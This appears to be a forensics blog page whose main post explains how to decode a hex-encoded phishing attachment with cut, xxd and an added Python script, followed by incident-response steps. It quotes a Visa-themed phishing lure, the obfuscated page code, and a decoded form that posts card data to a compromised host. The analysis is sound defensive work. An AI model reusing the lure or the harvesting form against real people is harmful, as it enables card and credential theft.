Forensics

Automated Phishing Analysis


I’m Handler of the day at the Internet Storm Center. Check out my post on how to automate phishing analysis and metrics.


Linux Memory Dump with Rekall


Over at isc.sans.org I’m handler of the day! My latest post discusses dumping Linux memory. Please stop by and read the post.

Stop, Drop and File Carve


My latest post on the Storm Center covers foremost and how to recover files off a corrupted drive.

Converting Hex encoded Javascript to Ascii via Commandline


We all get phishing emails quite often nowadays, so I wanted to post a quick way to deobfuscate hex-encoded JavaScript. There are many ways to do this, but I wanted a quick way via the command line.

My goal, when performing analysis on phishing emails, is to get the URL out of the code, report it, and block it.

Typical phishing email:

Dear Customer,

For security reasons, your card was blocked.

Following an abnormal activity, we saw that someone used the card without your permission, so to protect you, we blocked the card.

Once you have reactivated your Visa Card records, your card service will not be interrupted and will continue as normal.

To reactivate your Visa Card download and complete the form attached to this message.

Note: Failure to verify your records will result in card suspension.

Thank you.

Visa will periodically send you information about site changes and enhancements.

© Copyright 2001-2011 Visa. All Rights Reserved

File attached to email

Converting

In this case, the file was an HTML attachment to the email. I saved the file and opened it in a text editor. If I had needed to follow a link to a phishing site instead, I would have downloaded the page using Tor and a wget script.

The JavaScript below is simply hex encoded: the whole page is a percent-encoded (%XX) string that unescape() decodes at run time and document.write() renders.

<script language="javascript">
document.write( unescape( '%09%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%3C%74%69%74%6C%65%3E%56%65%72%69%66%69%65%64%20%62%79%20%56%69%73%61%3C%2F%74%69%74%6C%65%3E%0A%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%0A%20%20%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%63%73%73%2F%6E%75%65%76%6F%63%73%73%2E%63%73%73%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%0A

To convert it to ASCII, remove everything up to and including the first single quote, so the file begins with the first %. I did this with the Linux cut command, using the single quote as the delimiter, and saved the result as complete-document.htm:

# cat html.txt | cut -d "'" -f2 > complete-document.htm

%09%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%3C%74%69%74%6C%65%3E%56%65%72%69%66%69%65%64%20%62%79%20%56%69%73%61%3C%2F%74%69%74%6C%65%3E%0A%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%0A%20%20%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%63%73%73%2F%6E%75%65%76%6F%63%73%73%2E%63%73%73%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%0A

Now that we have just the hex-encoded part of the HTML, we use xxd in reverse plain-hexdump mode (-r -p) to convert it; xxd only consumes the hex digits, so the % separators are ignored:

# cat complete-document.htm | xxd -r -p | less

	<html>
<head>
  <title>Verified by Visa</title>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

  <link href="css/nuevocss.css" rel="stylesheet" type="text/css">
... (truncated) ...

That is it as far as decoding the file goes, but decoding is just the start of your incident response process.

Analysis

Within the decoded HTML you should see either additional links for the victim to follow, or a web form that POSTs to a website. In this case, you can grep for the words post and get to find out where the data is going:

# cat complete-document.htm | cut -d "'" -f2 | xxd -r -p | egrep -i 'post|get'

<form name="run.php" action="http://compromised-host.com/imicommerce/images/music/sample/.m/q.php" method="POST" onSubmit="return OnMultiSubmitHandler(optinLang)
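The cut / xxd / egrep pipeline above as one script, added here as an example; it is not the post's own code. It pulls out the string literal passed to unescape(), decodes it the way the browser would (both %XX and %uXXXX tokens, and literal characters between tokens are kept, which xxd -r -p cannot do since it only consumes hex digits and drops or misreads anything else), and then lists every form action and absolute link in the rebuilt page. The attachment it decodes is constructed inline; phish.example and visa.example are placeholder hosts, not real sites.

```python
"""Decode a document.write(unescape('%XX...')) phishing attachment and list
where its forms and links point.  Added example, not the original post's
script; the sample attachment below is constructed for this demo."""
import re

# Tokens exactly as JavaScript's unescape() accepts them:
# %XX for a Latin-1 code point, %uXXXX for a UTF-16 code unit.
_TOKEN = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
# The string literal handed to unescape(); keeps the same quote char on both ends.
_UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.DOTALL)
_FORM = re.compile(r"<form\b[^>]*>", re.I | re.S)
_ATTR = re.compile(r"""\b(action|href|src|method)\s*=\s*(['"]?)([^'"\s>]+)\2""", re.I)


def js_unescape(encoded: str) -> str:
    """Decode like JavaScript unescape(): literal text between tokens survives."""
    return _TOKEN.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), encoded)


def js_escape(plain: str) -> str:
    """Mirror of JavaScript escape() for BMP text; used only to build the sample."""
    out = []
    for ch in plain:
        cp = ord(ch)
        if (ch.isalnum() and cp < 128) or ch in "@*_+-./":
            out.append(ch)                 # escape() leaves these literal
        elif cp < 256:
            out.append("%%%02X" % cp)      # %XX form
        else:
            out.append("%%u%04X" % cp)     # %uXXXX form
    return "".join(out)


def extract_payloads(attachment: str) -> list:
    """The string literals passed to unescape(): what cut -d "'" -f2 isolates by hand."""
    return [m.group(2) for m in _UNESCAPE_CALL.finditer(attachment)]


def decode_attachment(attachment: str) -> str:
    """Rebuild the HTML that document.write(unescape(...)) would render."""
    return "".join(js_unescape(p) for p in extract_payloads(attachment))


def find_destinations(decoded_html: str) -> list:
    """Every form action with its method, then every absolute href/src.
    Same question as the egrep 'post|get' step, but returned as tuples."""
    found = []
    for form in _FORM.finditer(decoded_html):
        attrs = {k.lower(): v for k, _, v in _ATTR.findall(form.group(0))}
        if "action" in attrs:
            found.append(("form", attrs.get("method", "GET").upper(), attrs["action"]))
    for kind, _, url in _ATTR.findall(decoded_html):
        if kind.lower() in ("href", "src") and url.lower().startswith(("http://", "https://")):
            found.append((kind.lower(), "GET", url))
    return found


# Constructed sample: the same shape as the post's attachment, with a
# placeholder action URL.  The opening "\t<html>\n<head>" matches the
# start of the post's decoded output.
SAMPLE_PLAIN = (
    "\t<html>\n<head>\n  <title>Verified by Visa</title>\n</head>\n<body>\n"
    '<form name="run.php" action="http://phish.example/q.php" method="POST">\n'
    '  Card number: <input name="cc"> Fee: 0\u20ac <input type="submit">\n'
    "</form>\n"
    '<a href="http://visa.example/help">Help</a> \u00a9 2011\n'
    "</body>\n</html>\n"
)
SAMPLE_ATTACHMENT = (
    '<script language="javascript">\n'
    "document.write( unescape( '" + js_escape(SAMPLE_PLAIN) + "' ) );\n"
    "</script>\n"
)

if __name__ == "__main__":
    html = decode_attachment(SAMPLE_ATTACHMENT)
    print(html)
    for kind, method, url in find_destinations(html):
        print(f"{kind:5} {method:4} {url}")
```

Run it against a saved attachment by reading the file into decode_attachment(); the form tuple is the URL to report and block, the href/src entries are the extra links the victim could follow.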

Now that you have the URL, you will need to determine whether any systems on your network sent information to the website. Check logs from your DNS servers, firewall, network flows, web proxy servers and any other network intelligence source for connectivity to the site, to determine whether any users accessed it.

Remediation

  • Any system that accessed the site may have malware on it.
  • If the phish is targeting credentials, the user account should be locked and the user forced to reset their password.
  • If the user entered banking information, they will need to notify the bank ASAP.

Report the site as compromised to the WHOIS contact for the domain and to the security contact of the organization the phishing email is targeting, and add it to PhishTank.

Prevention

If you have a DNS blacklist server or web proxy, add the domain to the block list. Be careful if this site is part of a larger site, as you will be blocking access to the entire domain.

Creating a log2timeline plugin


I have a new post on the SANS forensics blog. This post covers the process of creating a plugin for the log2timeline tool. Using step-by-step instructions, I break down each section of the code and how it works. It should serve as a template for creating any plugin, but the example I cover is parsing an OS X plist.

OSX Lion Window Preservation


My first post on the SANS forensics blog is up! The post covers a new feature in OS X 10.7 (Lion). Lion saves the location of the windows and other data when the application closes. This additional data can be used to supplement your analysis. Mac is continuing to gain market share and we need to start taking a deeper look into this OS to get the most out of our investigations.

For more information about Mac incident response check out my previous post.